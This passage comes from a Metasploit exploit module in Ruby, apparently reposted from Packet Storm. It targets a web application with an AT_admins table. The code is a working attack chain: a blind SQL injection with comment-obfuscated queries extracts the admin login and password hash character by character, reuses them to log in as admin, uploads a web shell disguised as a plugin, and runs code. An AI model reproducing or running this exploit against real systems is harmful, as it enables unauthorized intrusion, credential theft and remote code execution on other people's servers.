sqli, 'rand_key' => rand_key, 'search' => 'Search People' }, 'cookie' => cookie, 'agent' => 'Mozilla' }) return res.body end def dump_the_hash(cookie) extracted_hash = "" sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)" login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli, cookie).to_i for i in 1..login_and_hash_length sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))" asciival = generate_sql_and_test(false, false, sqli, cookie) if asciival >= 0 extracted_hash << asciival.chr end end return extracted_hash.split(":") end def get_ascii_value(sql, cookie) lower = 0 upper = 126 while lower < upper mid = (lower + upper) / 2 sqli = "#{sql}>#{mid}" result = perform_request(sqli, cookie) if result =~ /There are d entries./ lower = mid + 1 else upper = mid end end if lower > 0 and lower < 126 value = lower else sqli = "#{sql}=#{lower}" result = perform_request(sqli, cookie) if result =~ /There are d entries./ value = lower end end return value end def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie) if do_test if do_true result = perform_request("1=1", cookie) if result =~ /There are d entries./ return true end else not do_true result = perform_request("1=2", cookie) if not result =~ /There are d entries./ return true end end elsif not do_test and sql return get_ascii_value(sql, cookie) end end def test_injection(cookie) if generate_sql_and_test(do_true=true, do_test=true, sql=nil, cookie) if generate_sql_and_test(do_true=false, do_test=true, sql=nil, cookie) return true end end return false end def report_cred(opts) service_data = { address: rhost, port: rport, service_name: ssl ? 'https' : 'http', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { module_fullname: fullname, post_reference_name: self.refname, private_data: opts[:password], origin_type: :service, private_type: :password, username: opts[:user] }.merge(service_data) login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, last_attempted_at: Time.now }.merge(service_data) create_credential_login(login_data) end def exploit student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...") report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD']) print_status("Dumping username and password hash...") # we got admin hash now credz = dump_the_hash(student_cookie) print_good("Got the #{credz[0]} hash: #{credz[1]} !") if credz admin_cookie = login(credz[0], credz[1], true) print_status("Logged in as #{credz[0]}, uploading shell...") # install a plugin if upload_shell(admin_cookie) print_good("Shell upload successful!") # boom exec_code end end end end exploit source : packetstormsecurity.com
×
×
  • Create New...